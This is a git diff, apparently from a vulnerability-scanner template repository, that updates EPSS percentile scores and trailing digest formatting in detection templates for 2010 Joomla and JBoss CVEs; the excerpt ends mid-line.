490a00463044022066d5d5c7849db99b6f47467d111d3a37930b08ef1f907f48c9449d1f8814602f022053bf34dd55442f4b0f358965762605b760cd12b922328b11c46cf83ed6ae3a70:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1081.yaml b/http/cves/2010/CVE-2010-1081.yaml index 00c79ddd10..60a8da21d1 100644 --- a/http/cves/2010/CVE-2010-1081.yaml +++ b/http/cves/2010/CVE-2010-1081.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-1081 cwe-id: CWE-22 epss-score: 0.0168 - epss-percentile: 0.8629 + epss-percentile: 0.86299 cpe: cpe:2.3:a:corejoomla:com_communitypolls:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022031e4522af0758fc58a5c957bfbc4bf2b979466a6f6e223de5fa3696b6ac4bdc2022066a1d64e6ceab506525060896bb3fe1175ed003659e4a04abbbf63b23aea66e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022031e4522af0758fc58a5c957bfbc4bf2b979466a6f6e223de5fa3696b6ac4bdc2022066a1d64e6ceab506525060896bb3fe1175ed003659e4a04abbbf63b23aea66e7:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1217.yaml b/http/cves/2010/CVE-2010-1217.yaml index 9df38598f9..1b0f747970 100644 --- a/http/cves/2010/CVE-2010-1217.yaml +++ b/http/cves/2010/CVE-2010-1217.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1217 cwe-id: CWE-22 epss-score: 0.01155 - epss-percentile: 0.83297 + epss-percentile: 0.83314 cpe: cpe:2.3:a:je_form_creator:je_form_creator:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402206181869e2b20dd8ee00e1fcca1add114da953caa2477e7dd1aec4a2fccf90ce6022063e81d7f2e0afd10a34ad341e1134f822160af3377c1797b0d1512d5e4ea588e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402206181869e2b20dd8ee00e1fcca1add114da953caa2477e7dd1aec4a2fccf90ce6022063e81d7f2e0afd10a34ad341e1134f822160af3377c1797b0d1512d5e4ea588e:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1219.yaml b/http/cves/2010/CVE-2010-1219.yaml index 939660420d..4a74eeff6a 100644 --- a/http/cves/2010/CVE-2010-1219.yaml +++ b/http/cves/2010/CVE-2010-1219.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-1219 cwe-id: CWE-22 epss-score: 0.00813 - epss-percentile: 0.79905 + epss-percentile: 0.79912 cpe: cpe:2.3:a:com_janews:com_janews:1.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201d15ef33962821ce946de83951126b6358abba9577194645f7b2c99891a527a8022100b847d7fe7ad7991fdbc44d8732dcecd2c131feefa97fc070e38d8d42114c8b3a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502201d15ef33962821ce946de83951126b6358abba9577194645f7b2c99891a527a8022100b847d7fe7ad7991fdbc44d8732dcecd2c131feefa97fc070e38d8d42114c8b3a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1302.yaml b/http/cves/2010/CVE-2010-1302.yaml index 6a1d96cef5..9bc2d413ee 100644 --- a/http/cves/2010/CVE-2010-1302.yaml +++ b/http/cves/2010/CVE-2010-1302.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2010-1302 cwe-id: CWE-22 epss-score: 0.01204 - epss-percentile: 0.83694 + epss-percentile: 0.83704 cpe: cpe:2.3:a:decryptweb:com_dwgraphs:1.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -37,4 +37,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100940037c124bf13df81bd7e61200ac7e09a25eb0ffe2218474ea6fd69fabcab3b0221009df54ceb755f30f3b22a1bd747657be0c9a572aaab4930b1a1bbe362e414e4be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100940037c124bf13df81bd7e61200ac7e09a25eb0ffe2218474ea6fd69fabcab3b0221009df54ceb755f30f3b22a1bd747657be0c9a572aaab4930b1a1bbe362e414e4be:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1304.yaml b/http/cves/2010/CVE-2010-1304.yaml index 30c86bd8b2..bfdbd7229d 100644 --- a/http/cves/2010/CVE-2010-1304.yaml +++ b/http/cves/2010/CVE-2010-1304.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1304 cwe-id: CWE-22 epss-score: 0.0045 - epss-percentile: 0.72322 + epss-percentile: 0.72337 cpe: cpe:2.3:a:joomlamo:com_userstatus:1.21.16:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100de0202d51eda604e9880a6ec64a5ec824d4781d9174950eff3a10b8de93f7211022100b60503f10a038203087db337e4a0019b3322919094eabb947dd18ea0bfb49939:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100de0202d51eda604e9880a6ec64a5ec824d4781d9174950eff3a10b8de93f7211022100b60503f10a038203087db337e4a0019b3322919094eabb947dd18ea0bfb49939:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1305.yaml b/http/cves/2010/CVE-2010-1305.yaml index 7a73e95326..da441cd378 100644 --- a/http/cves/2010/CVE-2010-1305.yaml +++ b/http/cves/2010/CVE-2010-1305.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1305 cwe-id: CWE-22 epss-score: 0.03203 - epss-percentile: 0.90107 + epss-percentile: 0.90114 cpe: cpe:2.3:a:joomlamo:com_jinventory:1.23.02:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100fca4f999abca2ae892c46e65c35a91e0bd841d55424e21d2d10abd201d6585a5022100cdfdc75f572ba8a2994d35ab0ac8155bb3d56c29aa682b80f01bc2665a71bf5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100fca4f999abca2ae892c46e65c35a91e0bd841d55424e21d2d10abd201d6585a5022100cdfdc75f572ba8a2994d35ab0ac8155bb3d56c29aa682b80f01bc2665a71bf5d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1306.yaml b/http/cves/2010/CVE-2010-1306.yaml index 353ea8f0a5..7a74215b07 100644 --- a/http/cves/2010/CVE-2010-1306.yaml +++ b/http/cves/2010/CVE-2010-1306.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-1306 cwe-id: CWE-22 epss-score: 0.01242 - epss-percentile: 0.83986 + epss-percentile: 0.83996 cpe: cpe:2.3:a:roberto_aloi:com_joomlapicasa2:2.0.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022060f8224c933cfcc942a9cbded1f3fd308a62fc2b0b93fd440d4bc56ab08bd22d022100af6d159a858360f6a63ab35cecf6277ceca4fe36e5c0d9fa03491aff91494148:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022060f8224c933cfcc942a9cbded1f3fd308a62fc2b0b93fd440d4bc56ab08bd22d022100af6d159a858360f6a63ab35cecf6277ceca4fe36e5c0d9fa03491aff91494148:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1307.yaml b/http/cves/2010/CVE-2010-1307.yaml index 4ef9da4957..8564d17966 100644 --- a/http/cves/2010/CVE-2010-1307.yaml +++ b/http/cves/2010/CVE-2010-1307.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1307 cwe-id: CWE-22 epss-score: 0.01751 - epss-percentile: 0.86574 + epss-percentile: 0.8658 cpe: cpe:2.3:a:software.realtyna:com_joomlaupdater:1.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100977eb986f0175c55b7ddf234cf42f8333687d82008fbc1d9574d7da261cafce1022100bf65b650ede1bb05ba220481ceb87f709093028f7a49aa0aa814f3e826dbc248:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100977eb986f0175c55b7ddf234cf42f8333687d82008fbc1d9574d7da261cafce1022100bf65b650ede1bb05ba220481ceb87f709093028f7a49aa0aa814f3e826dbc248:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1308.yaml b/http/cves/2010/CVE-2010-1308.yaml index 2a7fee8440..61c4789f9d 100644 --- a/http/cves/2010/CVE-2010-1308.yaml +++ b/http/cves/2010/CVE-2010-1308.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-1308 cwe-id: CWE-22 epss-score: 0.01334 - epss-percentile: 0.84589 + epss-percentile: 0.84598 cpe: cpe:2.3:a:la-souris-verte:com_svmap:1.1.1:*:*:*:*:*:*:* metadata: max-request: 1 @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f1791394bd86a7d97b66377af6f5d1055babf51df3785ec4acba3f2b74c890110220779e97e280fc8d0d371f7445ea62cf1dce4619ff7ada4cc3bb7363f294cf89c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100f1791394bd86a7d97b66377af6f5d1055babf51df3785ec4acba3f2b74c890110220779e97e280fc8d0d371f7445ea62cf1dce4619ff7ada4cc3bb7363f294cf89c7:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1312.yaml b/http/cves/2010/CVE-2010-1312.yaml index 3c49a1fbaf..61687a28d2 100644 --- a/http/cves/2010/CVE-2010-1312.yaml +++ b/http/cves/2010/CVE-2010-1312.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-1312 cwe-id: CWE-22 epss-score: 0.01155 - epss-percentile: 0.83297 + epss-percentile: 0.83314 cpe: cpe:2.3:a:ijoomla:com_news_portal:1.5.1:*:*:*:*:*:*:* metadata: max-request: 1 @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204ba7923bfe3e1cb8950bdf405427a9e23ff298d5a573f9f370a305bc9dd46d22022100db7994664a56864821f3f0a8b44fa959003926b83e750661a1ac4c3e619d1a07:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502204ba7923bfe3e1cb8950bdf405427a9e23ff298d5a573f9f370a305bc9dd46d22022100db7994664a56864821f3f0a8b44fa959003926b83e750661a1ac4c3e619d1a07:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1313.yaml b/http/cves/2010/CVE-2010-1313.yaml index 846664ff33..a9e83cc416 100644 --- a/http/cves/2010/CVE-2010-1313.yaml +++ b/http/cves/2010/CVE-2010-1313.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-1313 cwe-id: CWE-22 epss-score: 0.0045 - epss-percentile: 0.72322 + epss-percentile: 0.72337 cpe: cpe:2.3:a:seber:com_sebercart:1.0.0.12:*:*:*:*:*:*:* metadata: max-request: 1 @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 490a004630440220394944f1aca18a98e6508a1e5ea50522ea51a31010d3fe964e1d30d886cf783102205cdc1890cac6f1fdb5145a602098dfce8bb816ed369ee62b5474b79689d62774:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220394944f1aca18a98e6508a1e5ea50522ea51a31010d3fe964e1d30d886cf783102205cdc1890cac6f1fdb5145a602098dfce8bb816ed369ee62b5474b79689d62774:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1314.yaml b/http/cves/2010/CVE-2010-1314.yaml index 98e54769d4..4406c792e1 100644 --- a/http/cves/2010/CVE-2010-1314.yaml +++ b/http/cves/2010/CVE-2010-1314.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-1314 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.73105 + epss-percentile: 0.7312 cpe: cpe:2.3:a:joomlanook:com_hsconfig:1.5:*:*:*:*:*:*:* metadata: max-request: 1 @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b5506376e964b1166a282b5ad306eb01c8c461f4830701c5e5b0f84444fd1a66022100891e788b735397964d8bfa657efd77b1632575e0c4299d9128dcad2a0ba60b4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100b5506376e964b1166a282b5ad306eb01c8c461f4830701c5e5b0f84444fd1a66022100891e788b735397964d8bfa657efd77b1632575e0c4299d9128dcad2a0ba60b4e:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1315.yaml b/http/cves/2010/CVE-2010-1315.yaml index afacf8cbac..35813bdf60 100644 --- a/http/cves/2010/CVE-2010-1315.yaml +++ b/http/cves/2010/CVE-2010-1315.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1315 cwe-id: CWE-22 epss-score: 0.0087 - epss-percentile: 0.8057 + epss-percentile: 0.80583 cpe: cpe:2.3:a:joomlamo:com_weberpcustomer:1.2.1:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ca00bc725bc266fc3057b46cad3eff57bb4d0882fab2759eea2d0ad8f8a7609902206bbd6fb968fd51a904544ccd8568811b186986800c7fdcc0d3a8f6b9ab44e25b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100ca00bc725bc266fc3057b46cad3eff57bb4d0882fab2759eea2d0ad8f8a7609902206bbd6fb968fd51a904544ccd8568811b186986800c7fdcc0d3a8f6b9ab44e25b:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1340.yaml b/http/cves/2010/CVE-2010-1340.yaml index 68f56bc306..2e7623880a 100644 --- a/http/cves/2010/CVE-2010-1340.yaml +++ b/http/cves/2010/CVE-2010-1340.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1340 cwe-id: CWE-22 epss-score: 0.01155 - epss-percentile: 0.83297 + epss-percentile: 0.83314 cpe: cpe:2.3:a:joomla-research:com_jresearch:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100adf1ec26d20fd0ed411cd1c1cb346f9b1df9be477ee020883fa8a0d151f895c1022100c8bfb05d3fb37a7d5c0916a194c713e94da325edc21085a424650c2a5f906b89:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100adf1ec26d20fd0ed411cd1c1cb346f9b1df9be477ee020883fa8a0d151f895c1022100c8bfb05d3fb37a7d5c0916a194c713e94da325edc21085a424650c2a5f906b89:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1345.yaml b/http/cves/2010/CVE-2010-1345.yaml index a3c7d91a14..ef268801e7 100644 --- a/http/cves/2010/CVE-2010-1345.yaml +++ b/http/cves/2010/CVE-2010-1345.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-1345 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.73105 + epss-percentile: 0.7312 cpe: cpe:2.3:a:cookex:com_ckforms:1.3.3:*:*:*:*:*:*:* metadata: max-request: 1 @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100dc0a1c6a1da64202828d550ff5ccbcfcdacca334be68f908983a71cc1ed652d1022100b59ea2378a9305c93e2549d036c520c09d0ddb0dc13c3222753a344c04a9fe8a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100dc0a1c6a1da64202828d550ff5ccbcfcdacca334be68f908983a71cc1ed652d1022100b59ea2378a9305c93e2549d036c520c09d0ddb0dc13c3222753a344c04a9fe8a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1352.yaml b/http/cves/2010/CVE-2010-1352.yaml index 5fafc41387..af624ec05a 100644 --- a/http/cves/2010/CVE-2010-1352.yaml +++ b/http/cves/2010/CVE-2010-1352.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-1352 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.73105 + epss-percentile: 0.7312 cpe: cpe:2.3:a:jooforge:com_jukebox:1.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402200bc4604af28a8a69301577ae2207c4e74eb22f4474b0c56623219ea67d8b61b40220674985c6969dbfd3c209d3390817c3ec9a2771f24e0b7492b89f68db7424bfc5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402200bc4604af28a8a69301577ae2207c4e74eb22f4474b0c56623219ea67d8b61b40220674985c6969dbfd3c209d3390817c3ec9a2771f24e0b7492b89f68db7424bfc5:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1353.yaml b/http/cves/2010/CVE-2010-1353.yaml index 44c4eb696b..8e2864d663 100644 --- a/http/cves/2010/CVE-2010-1353.yaml +++ b/http/cves/2010/CVE-2010-1353.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1353 cwe-id: CWE-22 epss-score: 0.01751 - epss-percentile: 0.86574 + epss-percentile: 0.8658 cpe: cpe:2.3:a:wowjoomla:com_loginbox:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402203917b4123306899765ffed4241747e86b085dc3b7041dae7e10f2f1937bd8929022065ed467a70cbec1ad1c04325dc72f28dc9bbf3f01e2aabc13f9687fa96850416:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402203917b4123306899765ffed4241747e86b085dc3b7041dae7e10f2f1937bd8929022065ed467a70cbec1ad1c04325dc72f28dc9bbf3f01e2aabc13f9687fa96850416:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1354.yaml b/http/cves/2010/CVE-2010-1354.yaml index ac881637d4..2d8a4fb50a 100644 --- a/http/cves/2010/CVE-2010-1354.yaml +++ b/http/cves/2010/CVE-2010-1354.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1354 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.73105 + epss-percentile: 0.7312 cpe: cpe:2.3:a:ternaria:com_vjdeo:1.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402200964f84ad28a587b49a15042b692066d2086537b0755c0cec01844eaf7d8a8d702204532c2d0a93f950f2c806140786951c3e8c694110892493f24d4bd1d8387c1f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402200964f84ad28a587b49a15042b692066d2086537b0755c0cec01844eaf7d8a8d702204532c2d0a93f950f2c806140786951c3e8c694110892493f24d4bd1d8387c1f5:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1429.yaml b/http/cves/2010/CVE-2010-1429.yaml index d9b4db9d60..f8940060a7 100644 --- a/http/cves/2010/CVE-2010-1429.yaml +++ b/http/cves/2010/CVE-2010-1429.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1429 cwe-id: CWE-264 epss-score: 0.00573 - epss-percentile: 0.75498 + epss-percentile: 0.75511 cpe: cpe:2.3:a:redhat:jboss_enterprise_application_platform:*:cp08:*:*:*:*:*:* metadata: verified: true @@ -47,4 +47,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206017b2bf994b1d880dde7aea15852e5069cb7a88d73c7524d49706e345239286022100db2e56ac1747129b291dc9cfdaad053ff93b44f740ef16733f33c381932fa416:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502206017b2bf994b1d880dde7aea15852e5069cb7a88d73c7524d49706e345239286022100db2e56ac1747129b291dc9cfdaad053ff93b44f740ef16733f33c381932fa416:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1461.yaml b/http/cves/2010/CVE-2010-1461.yaml index 1dae340b57..37affa78a0 100644 --- a/http/cves/2010/CVE-2010-1461.yaml +++ b/http/cves/2010/CVE-2010-1461.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-1461 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.73105 + epss-percentile: 0.7312 cpe: cpe:2.3:a:gogoritas:com_photobattle:1.0.1:*:*:*:*:*:*:* metadata: max-request: 1 @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402200edbac95c1ba91183068c46e231561849abe738cb951e1f4560e3824d0d03f1502205bdb9a8f1e2e3abc2ef2d2a263d18d811f77edd4414fea51fdcaf61c64f69fab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402200edbac95c1ba91183068c46e231561849abe738cb951e1f4560e3824d0d03f1502205bdb9a8f1e2e3abc2ef2d2a263d18d811f77edd4414fea51fdcaf61c64f69fab:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1469.yaml b/http/cves/2010/CVE-2010-1469.yaml index 08d963f92b..d2381675f6 100644 --- a/http/cves/2010/CVE-2010-1469.yaml +++ b/http/cves/2010/CVE-2010-1469.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1469 cwe-id: CWE-22 epss-score: 0.00813 - epss-percentile: 0.79905 + epss-percentile: 0.79912 cpe: cpe:2.3:a:ternaria:com_jprojectmanager:1.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e37946366b693b5e024e8ddccd405fa27c32d2ddc64385ef9e055a9eb378fb54022036391f7a744ab0223caffb6359b030d5bcc98efc18ee3b6deb2493e59d8c6f68:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100e37946366b693b5e024e8ddccd405fa27c32d2ddc64385ef9e055a9eb378fb54022036391f7a744ab0223caffb6359b030d5bcc98efc18ee3b6deb2493e59d8c6f68:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1470.yaml b/http/cves/2010/CVE-2010-1470.yaml index 764b00f2a6..df6296260c 100644 --- a/http/cves/2010/CVE-2010-1470.yaml +++ b/http/cves/2010/CVE-2010-1470.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1470 cwe-id: CWE-22 epss-score: 0.04616 - epss-percentile: 0.91636 + epss-percentile: 0.91642 cpe: cpe:2.3:a:dev.pucit.edu.pk:com_webtv:1.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d86b629860fe8bbbfc0f934010f74aa98cf801cdccee7e88c089e013ebde7e4f0221009b3496ef163e7cafae67428fa6a444d98a7a821d12ba5cff655824d39ff58a78:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100d86b629860fe8bbbfc0f934010f74aa98cf801cdccee7e88c089e013ebde7e4f0221009b3496ef163e7cafae67428fa6a444d98a7a821d12ba5cff655824d39ff58a78:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1471.yaml b/http/cves/2010/CVE-2010-1471.yaml index dc7bc011a5..4a991b5f7a 100644 --- a/http/cves/2010/CVE-2010-1471.yaml +++ b/http/cves/2010/CVE-2010-1471.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1471 cwe-id: CWE-22 epss-score: 0.05684 - epss-percentile: 0.9249 + epss-percentile: 0.92493 cpe: cpe:2.3:a:b-elektro:com_addressbook:1.5.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100dc6b81fcbb2332ae132713ba032399df94b930328b90ae83634b23501784fc30022065c6cd8fd6de709808c44d496bd0126fc2b87daf98f9d6afc77a16726889bcef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100dc6b81fcbb2332ae132713ba032399df94b930328b90ae83634b23501784fc30022065c6cd8fd6de709808c44d496bd0126fc2b87daf98f9d6afc77a16726889bcef:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1472.yaml b/http/cves/2010/CVE-2010-1472.yaml index 306458c223..de89f23b02 100644 --- a/http/cves/2010/CVE-2010-1472.yaml +++ b/http/cves/2010/CVE-2010-1472.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1472 cwe-id: CWE-22 epss-score: 0.05684 - epss-percentile: 0.9249 + epss-percentile: 0.92493 cpe: cpe:2.3:a:kazulah:com_horoscope:1.5.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022013c1652993e9c855e37c290978a404bcfc7deb0cf484a0165283d47d2e233bbb02205791bee765783ba5de9456472b640441b85852941922bd0a3ce3576d2dd4b6df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022013c1652993e9c855e37c290978a404bcfc7deb0cf484a0165283d47d2e233bbb02205791bee765783ba5de9456472b640441b85852941922bd0a3ce3576d2dd4b6df:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1473.yaml b/http/cves/2010/CVE-2010-1473.yaml index d660467a5e..af364b5d24 100644 --- a/http/cves/2010/CVE-2010-1473.yaml +++ b/http/cves/2010/CVE-2010-1473.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-1473 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.80069 + epss-percentile: 0.80076 cpe: cpe:2.3:a:johnmccollum:com_advertising:0.25:*:*:*:*:*:*:* metadata: max-request: 1 @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100deb3701eb94b50a9cfe05f3e200c01374a4297622d7cb11c3687a87160109182022100f1bc0ec8cc540cbb8460c22b15ff8d9923406cdfa38ca1a28290506825e7848c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100deb3701eb94b50a9cfe05f3e200c01374a4297622d7cb11c3687a87160109182022100f1bc0ec8cc540cbb8460c22b15ff8d9923406cdfa38ca1a28290506825e7848c:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1474.yaml b/http/cves/2010/CVE-2010-1474.yaml index 2248342224..0b53993bca 100644 --- a/http/cves/2010/CVE-2010-1474.yaml +++ b/http/cves/2010/CVE-2010-1474.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1474 cwe-id: CWE-22 epss-score: 0.01242 - epss-percentile: 0.83986 + epss-percentile: 0.83996 cpe: cpe:2.3:a:supachai_teasakul:com_sweetykeeper:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022025799e437850dc1ad88ae5fb2df7cb6cb6091eeadf215f674452d09c6aec17a302205ebd22423d7e476d36821a69684e5263b7c067a3352377a9fbd15b8f4e57358a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022025799e437850dc1ad88ae5fb2df7cb6cb6091eeadf215f674452d09c6aec17a302205ebd22423d7e476d36821a69684e5263b7c067a3352377a9fbd15b8f4e57358a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1475.yaml b/http/cves/2010/CVE-2010-1475.yaml index 4190f82fa0..0953142b9c 100644 --- a/http/cves/2010/CVE-2010-1475.yaml +++ b/http/cves/2010/CVE-2010-1475.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1475 cwe-id: CWE-22 epss-score: 0.01242 - epss-percentile: 0.83986 + epss-percentile: 0.83996 cpe: cpe:2.3:a:ternaria:com_preventive:1.0.5:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022017d4b3fbf5e6125fec8c151f716934fb9b777119d320b50bc15811a209cdbdf60220265ee9c82b8cd66bcb045e1bc02d1d30e9805c496f04eed99afee7f9201c3fb2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022017d4b3fbf5e6125fec8c151f716934fb9b777119d320b50bc15811a209cdbdf60220265ee9c82b8cd66bcb045e1bc02d1d30e9805c496f04eed99afee7f9201c3fb2:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1476.yaml b/http/cves/2010/CVE-2010-1476.yaml index 897a846119..94856982fd 100644 --- a/http/cves/2010/CVE-2010-1476.yaml +++ b/http/cves/2010/CVE-2010-1476.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1476 cwe-id: CWE-22 epss-score: 0.03527 - epss-percentile: 0.90512 + epss-percentile: 0.90518 cpe: cpe:2.3:a:alphaplug:com_alphauserpoints:1.5.5:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022062d350dec181362553d6ca2a3d237ac08079730d0b654d53e1e5a950a6cbea0c02204ba12524db1ada691a27a79b975b4bbc138be83d7d914d3437f87b036c6a2097:922c64590222798bb761d5b6d8e72950 \ No newline at end 